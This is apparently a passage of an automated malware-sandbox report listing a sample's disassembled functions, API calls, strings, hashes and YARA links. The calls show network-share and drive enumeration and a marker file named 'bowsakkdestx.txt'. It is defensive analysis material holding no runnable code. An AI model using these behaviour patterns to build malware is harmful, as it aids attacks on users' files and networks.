                                                                                      • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                      • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                                                                      • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                      • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00425341, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _wcsnlen
                                                                                      • String ID: U
                                                                                      • API String ID: 3628947076-3372436214
                                                                                      • Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                      • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                                                                                      • Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                      • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00462FF0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _fprintf_memset
                                                                                      • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                      • API String ID: 3021507156-3399676524
                                                                                      • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                      • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                                                                      • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                      • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040C500, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Path$AppendFolder
                                                                                      • String ID: bowsakkdestx.txt
                                                                                      • API String ID: 29327785-2616962270
                                                                                      • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                      • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                                                                      • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                      • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0041BA80, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32 ref: 0041BAAD
                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                                                                      • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$CreateShowUpdate
                                                                                      • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                      • API String ID: 2944774295-3503800400
                                                                                      • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                      • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                                                                                      • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                      • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00410BD0, Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                                                                                      • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                                                                                      • _memset.LIBCMT ref: 00410C4C
                                                                                      • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                      • String ID:
                                                                                      • API String ID: 364255426-0
                                                                                      • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                      • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                      • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                      • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00410A50, Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                      • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                      • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                      • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                      • String ID:
                                                                                      • API String ID: 2560635915-0
                                                                                      • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                      • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                                                                      • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                      • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0043B6FF, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 0043B70B
                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005E0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                      • _free.LIBCMT ref: 0043B71E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                      • String ID:
                                                                                      • API String ID: 1020059152-0
                                                                                      • Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                      • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                                                                      • Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                      • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0041F070, Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 1380987712-0
                                                                                      • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                      • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                      • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                      • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0041E500, Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 1380987712-0
                                                                                      • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                      • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                      • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                      • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0041FA40, Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32 ref: 0041FA53
                                                                                      • PeekMessageW.USER32 ref: 0041FA71
                                                                                      • DispatchMessageW.USER32 ref: 0041FA7B
                                                                                      • PeekMessageW.USER32 ref: 0041FA89
                                                                                      • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 1380987712-0
                                                                                      • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                      • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                                                                                      • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                      • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0041FDF0, Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32 ref: 0041FE03
                                                                                      • PeekMessageW.USER32 ref: 0041FE21
                                                                                      • DispatchMessageW.USER32 ref: 0041FE2B
                                                                                      • PeekMessageW.USER32 ref: 0041FE39
                                                                                      • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 1380987712-0
                                                                                      • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                      • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                                                                                      • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                      • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00417BA0, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove
                                                                                      • String ID: invalid string position$string too long
                                                                                      • API String ID: 4104443479-4289949731
                                                                                      • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                      • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                                                                                      • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                      • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00414160, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove
                                                                                      • String ID: invalid string position$string too long
                                                                                      • API String ID: 4104443479-4289949731
                                                                                      • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                      • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                      • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                      • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0045AD50, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                      • API String ID: 2102423945-2013712220
                                                                                      • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                      • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                                                                      • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                      • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040C5C0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: StringUuid$CreateFree
                                                                                      • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                      • API String ID: 3044360575-2335240114
                                                                                      • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                      • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                                                                      • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                      • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00437A2D, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _wcscmp
                                                                                      • String ID: ACP$OCP
                                                                                      • API String ID: 856254489-711371036
                                                                                      • Opcode ID: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
                                                                                      • Instruction ID: be6dee110b44ec76455643647cb0bd3c477e6d53c765760a4e3a4e904bc1756d
                                                                                      • Opcode Fuzzy Hash: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
                                                                                      • Instruction Fuzzy Hash: EF01C4A2608215B6EB34BA59DC42FAE37899F0C3A4F105417F948D6281F77CEB4042DC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040C470, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Path$AppendFolder
                                                                                      • String ID: bowsakkdestx.txt
                                                                                      • API String ID: 29327785-2616962270
                                                                                      • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                      • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                                                                                      • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                      • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00423B4C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 00423B64
                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005E0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                      • std::exception::exception.LIBCMT ref: 00423B82
                                                                                      • __CxxThrowException@8.LIBCMT ref: 00423B97
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                      • String ID: bad allocation
                                                                                      • API String ID: 3074076210-2104205924
                                                                                      • Opcode ID: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                                                                                      • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                                                                                      • Opcode Fuzzy Hash: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                                                                                      • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0041BA10, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                      • RegisterClassExW.USER32 ref: 0041BA73
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ClassCursorLoadRegister
                                                                                      • String ID: 0$LPCWSTRszWindowClass
                                                                                      • API String ID: 1693014935-1496217519
                                                                                      • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                      • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                                                                                      • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                      • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040C420, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Path$AppendDeleteFileFolder
                                                                                      • String ID: bowsakkdestx.txt
                                                                                      • API String ID: 610490371-2616962270
                                                                                      • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                      • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                                                                      • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                      • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00427C2E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __FF_MSGBANNER.LIBCMT ref: 00427C31
                                                                                        • Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F78
                                                                                        • Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F82
                                                                                      • __NMSG_WRITE.LIBCMT ref: 00427C39
                                                                                        • Part of subcall function 00427FAE: GetModuleFileNameW.KERNEL32(00000000,005104BA,00000104,?,00000001,i;B), ref: 00428040
                                                                                        • Part of subcall function 00427FAE: ___crtMessageBoxW.LIBCMT ref: 004280EE
